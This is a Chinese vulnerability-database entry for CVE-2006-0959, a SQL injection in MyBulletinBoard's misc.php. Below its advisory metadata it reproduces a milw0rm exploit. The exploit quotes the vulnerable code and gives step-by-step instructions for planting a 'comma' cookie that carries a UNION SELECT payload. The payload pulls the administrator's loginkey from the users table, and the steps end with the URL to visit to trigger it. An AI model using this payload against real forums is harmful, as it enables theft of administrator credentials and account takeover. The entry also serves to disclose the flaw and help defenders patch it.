MyBulletinBoard 'misc.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109836 漏洞类型 SQL注入
发布时间 2006-02-28 更新时间 2006-10-05
CVE编号 CVE-2006-0959 CNNVD-ID CNNVD-200603-004
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1539
https://cxsecurity.com/issue/WLB-2006030013
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-004
|漏洞详情
在MyBulletinBoard(MyBB)1.03版本的misc.php中存在SQL注入漏洞,当register_globals被激活时,会使远程攻击者通过在一个cookie中的comma参数中设置comma变量值,执行任意SQL命令。注意:1.04版本也报告过受到影响。
|漏洞EXP
MyBB New SQL Injection

D3vil-0x1 < Devil-00 >

Milw0rm ID :-
http://www.milw0rm.com/auth.php?id=1320

The Inf.File :-
misc.php

Linez :-

[code]
	$buddies = $mybb->user['buddylist'];

	$namesarray = explode(",",$buddies);

	if(is_array($namesarray))

	{

		while(list($key, $buddyid) = each($namesarray))

		{

			$sql .= "$comma'$buddyid'"; <== HERE :) Uncleard Var !!

			$comma = ",";

		}

	$timecut = time() - $mybb->settings['wolcutoff'];

	$query = $db->query("SELECT u.*, g.canusepms FROM ".TABLE_PREFIX."users u LEFT JOIN ".TABLE_PREFIX."usergroups g ON (g.gid=u.usergroup) WHERE u.uid IN ($sql)");
[/code]

From 255 to 265

The GLOBALS unset function .. do not unset $_COOKIES ..
then u can start attacking any var by cookies :)

Tested MyBB 1.3 .. Register_Globals = On

Explorer Exploit :-

1- Login by any username ..
2- Create new cookie (
	name 	=> "comma"
	value	=> "comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1 FROM mybb_users WHERE uid=1/*")

3- Check The URL :-
HOST/PATH/misc.php?action=buddypopup

Where HOST = The Vic.Server And PATH = MyBB Dir.

# milw0rm.com [2006-02-28]
|参考资料

来源:XF
名称:mybb-misc-sql-injection(24953)
链接:http://xforce.iss.net/xforce/xfdb/24953
来源:BID
名称:16631
链接:http://www.securityfocus.com/bid/16631
来源:BUGTRAQ
名称:20060303MyBB1.04PerlExploit
链接:http://www.securityfocus.com/archive/1/archive/1/426653/100/0/threaded
来源:BUGTRAQ
名称:20060228MyBB1.3NewSQLInjection
链接:http://www.securityfocus.com/archive/1/archive/1/426320/100/0/threaded
来源:OSVDB
名称:23554
链接:http://www.osvdb.org/23554
来源:VUPEN
名称:ADV-2006-0774
链接:http://www.frsirt.com/english/advisories/2006/0774
来源:SECUNIA
名称:19061
链接:http://secunia.com/advisories/19061
来源:SREASON
名称:512
链接:http://securityreason.com/securityalert/512
来源:MILW0RM
名称:1539
链接:http://milw0rm.com/exploits/1539